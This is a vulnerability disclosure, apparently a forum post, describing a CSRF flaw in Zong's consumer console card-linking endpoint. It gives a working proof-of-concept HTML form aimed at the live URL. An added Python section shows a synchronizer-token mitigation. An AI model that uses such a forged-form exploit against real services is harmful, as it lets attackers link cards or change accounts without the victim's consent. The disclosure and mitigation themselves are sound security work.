CSRF vulnerable URL: https://my.zong.com/ZPlusConsumerCon...creditCardLink
CSRF is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated (OWASP).
POC:
Code:
<form action="https://my.zong.com/ZPlusConsumerConsole/linkCC/creditCardLink" method="post" name="manageCreditCardForm" id="manageCreditCardForm">
  <input type="hidden" name="consumer_id" value="10053353027" id="consumer_id">
  <input type="hidden" name="is_update" value="false" id="is_update">
  <label for="billing_first_name">First name</label>
  <input type="text" class="text required" id="billing_first_name" name="billing_first_name" value="sandeep">
  <label for="billing_last_name">Last name</label>
  <input type="text" class="text required" id="billing_last_name" name="billing_last_name" value="kamble">
  <label for="billing_card_type">Card type</label>
  <select name="billing_card_type" class="select1" id="billing_card_type">
    <option value="Visa">Visa</option>
    <option value="MasterCard">MasterCard</option>
    <option value="AmericanExpress">American Express</option>
    <option value="Discover">Discover</option>
  </select>
  <label for="billing_card_number">Card number</label>
  <input type="text" class="text required" id="billing_card_number" name="billing_card_number" value="442411000016">
  <label for="billing_exp_month">Expiration date</label>
  <select name="billing_exp_month" class="select2" id="billing_exp_month">
    <option value="-1">Month</option>
    <option value="1">1</option> <option value="2">2</option> <option value="3">3</option> <option value="4">4</option>
    <option value="5">5</option> <option value="6">6</option> <option value="7">7</option> <option value="8">8</option>
    <option value="9">9</option> <option value="10">10</option> <option value="11">11</option> <option value="12">12</option>
  </select>
  <select name="billing_exp_year" class="select2" id="billing_exp_year">
    <option value="-1">Year</option>
    <option value="2013">2013</option> <option value="2014">2014</option> <option value="2015">2015</option> <option value="2016">2016</option>
    <option value="2017">2017</option> <option value="2018">2018</option> <option value="2019">2019</option> <option value="2020">2020</option>
    <option value="2021">2021</option> <option value="2022">2022</option> <option value="2023">2023</option>
  </select>
  <label for="billing_***">Security code</label>
  <input type="text" class="*** required" id="billing_***" maxlength="4" name="billing_***" value="">
  <button type="submit" id="_eventId_continue" name="_eventId_continue" value="continue" class="enterBtn"><span>Link Card</span></button>
</form>
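The form above works as a CSRF vector because the card-linking POST accepts any request that carries the victim's session cookie and nothing else. As an added mitigation example (not part of the original disclosure and not Zong's code), the following Python shows a synchronizer-token check for that POST, using the field names from the form; the token field name, the session store, the trusted origin and the sample requests are assumptions of this example.

```python
import hmac
import secrets

# Assumed names for this example: the token field and the trusted origin.
TOKEN_FIELD = "csrf_token"
TRUSTED_ORIGIN = "https://my.zong.com"


def issue_csrf_token(session: dict) -> str:
    """Create (once per session) and return the synchronizer token."""
    if TOKEN_FIELD not in session:
        session[TOKEN_FIELD] = secrets.token_urlsafe(32)
    return session[TOKEN_FIELD]


def render_hidden_token(session: dict) -> str:
    """Hidden input the legitimate form carries; a cross-site page cannot read it."""
    return f'<input type="hidden" name="{TOKEN_FIELD}" value="{issue_csrf_token(session)}">'


def is_valid_link_card_request(session: dict, form: dict, headers: dict) -> bool:
    """Server-side gate for POST /ZPlusConsumerConsole/linkCC/creditCardLink.

    Accepts only if (1) Origin/Referer, when sent, belongs to the console and
    (2) the submitted token equals the session token.  A cross-site form
    like the POC above fails (2) because it has no token to submit.
    """
    origin = headers.get("Origin") or headers.get("Referer") or ""
    if origin and origin != TRUSTED_ORIGIN and not origin.startswith(TRUSTED_ORIGIN + "/"):
        return False
    expected = session.get(TOKEN_FIELD)
    supplied = form.get(TOKEN_FIELD, "")
    if not expected or not supplied:
        return False
    # Constant-time comparison so the token cannot be recovered by timing.
    return hmac.compare_digest(expected, supplied)


# Constructed sample: the POC form's fields, which include no token at all.
POC_FORM = {"consumer_id": "10053353027", "is_update": "false",
            "billing_card_number": "442411000016"}


def demo() -> tuple:
    """Return (forged_accepted, legitimate_accepted) for the two request kinds."""
    session = {}
    token = issue_csrf_token(session)
    forged = is_valid_link_card_request(session, POC_FORM, {"Origin": "https://other-site.example"})
    legit = is_valid_link_card_request(session, {**POC_FORM, TOKEN_FIELD: token},
                                       {"Origin": TRUSTED_ORIGIN})
    return forged, legit
```

With this check in place the token must also be embedded in the real form via render_hidden_token(); a SameSite cookie attribute adds a second, independent layer.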

Special thanks to My G4H Team.
--[S]